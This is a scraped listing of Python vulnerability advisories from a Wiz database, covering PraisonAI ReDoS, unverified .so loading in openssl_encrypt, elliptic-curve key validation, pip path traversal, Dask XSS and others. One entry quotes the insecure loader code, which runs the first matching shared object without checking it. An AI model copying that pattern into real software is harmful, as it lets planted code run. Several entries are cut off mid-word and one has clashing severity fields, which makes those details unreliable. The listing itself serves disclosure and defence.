| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 23.6 |
| Exploitation Probability (EPSS) | 0.1 |
| Affected packages and libraries | indico |
| Sources | NVD |
| pip | Severity MEDIUM, Has Fix, Added at: Feb 18, 2026 |
## CVE-2026-34939 [MEDIUM] (CVSS 6.5): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.90, MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage. This issue has been patched in version 4.5.90.
| Field | Value |
|---|---|
| Source | NVD |
| Score | 6.5 |
| Published | April 3, 2026 |
| Severity | MEDIUM |
| CNA Score | 6.5 |
| Affected Technologies | Python |
| Has Public Exploit | No |
| Has CISA KEV Exploit | No |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 12 |
| Exploitation Probability (EPSS) | N/A |
Affected pack
## GHSA-j48q-4c78-rhf9 [CRITICAL] (CVSS 9.2): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
## Severity: HIGH
## Summary
Affected file: `openssl_encrypt/modules/registry/hash_registry.py`, which loads a `.so` extension module through `importlib`.
## Affected Code
```python
# Imports are not part of the quoted excerpt; they are the ones the excerpt needs to run.
import glob
import os
import site
import importlib.util
from importlib.machinery import ExtensionFileLoader

for site_pkg in site.getsitepackages():
    # Glob for any file named like a whirlpool extension built for Python 3.13
    pattern = os.path.join(site_pkg, "whirlpool*py313*.so")
    py313_modules = glob.glob(pattern)
    if py313_modules:
        module_path = py313_modules[0]  # Takes first match
        # Load the matched shared object as the "whirlpool" module and execute it
        loader = ExtensionFileLoader("whirlpool", module_path)
        spec = importlib.util.spec_from_file_location("whirlpool", module_path, loader=loader)
        whirlpool_module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(whirlpool_module)
```
## Impact
The first file matching `"whirlpool*py313*.so"` is loaded without checking its file hash/signature or its file ownership/permissions before the `.so` is executed.
## Recommended Fix
Verify the module's integrity (hash or signature) befo
## CVE-2026-26007 [HIGH] (CVSS 8.2): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 46.0.5, the public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks i
## CVE-2025-67715 [MEDIUM] (CVSS 4.3): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
Weblate is a web-based localization tool. In versions prior to 5.15, it was possible to retrieve user notification settings or list all users via the API. Version 5.15 fixes the issue.
| Field | Value |
|---|---|
| Source | NVD |
| Score | 4.3 |
| Published | December 16, 2025 |
| Severity | MEDIUM |
| CNA Score | 4.3 |
| Affected Technologies | Python |
| Has Public Exploit | No |
| Has CISA KEV Exploit | No |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 1.9 |
| Exploitation Probability (EPSS) | N/A |
| Affected packages and libraries | weblate |
| Sources | NVD |
| pip | Severity MEDIUM, Has Fix, Added at: Dec 16, 2025 |
## CVE-2026-1703 [LOW] (CVSS 2.0): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
When pip is installing and extracting a maliciously crafted wheel archive, files may be extracted outside the installation directory. The path traversal is limited to prefixes of the installation directory, thus isn't able to inject or overwrite executable files in typical situations.
| Field | Value |
|---|---|
| Source | NVD |
| Score | 2 |
| Published | February 2, 2026 |
| Severity | LOW |
| CNA Score | 2.0 |
| Affected Technologies | Python, CBL Mariner |
| Has Public Exploit | No |
| Has CISA KEV Exploit | No |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 5.9 |
| Exploitation Probability (EPSS) | N/A |
| Affected packages and libraries | rhel9/python-311, ubi9/python-39 |
| Sources | NVD |
| CBL-Mariner 3.0 | Severity LOW, Has Fix, Added at: Mar 13 |
## CVE-2026-23528 [MEDIUM] (CVSS 5.3): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
Dask distributed is a distributed task scheduler for Dask. Prior to 2026.1.0, when Jupyter Lab, jupyter-server-proxy, and Dask distributed are all run together, it is possible to craft a URL which will result in code being executed by Jupyter due to a cross-site scripting (XSS) bug in the Dask dashboard. It is possible for attackers to craft a phishing URL that assumes Jupyter Lab and Dask may be running on localhost and using default ports. If a user clicks on the malicious link, it will open an error page in the Dask Dashboard via the Jupyter Lab proxy, which will cause code to be executed by the default Jupyter Python kernel. This vulnerability is fixed in 2026.1.0.
| Field | Value |
|---|---|
| Source | NVD |
| Score | 5.3 |
| Published | January 16, 202 |
## CVE-2025-14882 [LOW] (CVSS 3.8): Impact, Exploitability, and Mitigation Steps | Wiz
Python vulnerability analysis and mitigation
An API endpoint allowed access to other users' sensitive files to anyone who knew the file's UUID, even though those files were not intended to be accessible by UUID alone.
| Field | Value |
|---|---|
| Source | NVD |
| Score | 3.8 |
| Published | December 19, 2025 |
| Severity | LOW |
| CNA Score | 3.8 |
| Affected Technologies | Python |
| Has Public Exploit | No |
| Has CISA KEV Exploit | No |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 18 |
| Exploitation Probability (EPSS) | 0.1 |
| Affected packages and libraries | pretix |
| Sources | NVD |
| pip | Severity LOW, Has Fix, Added at: Dec 22, 2025 |
Published 2026-04-07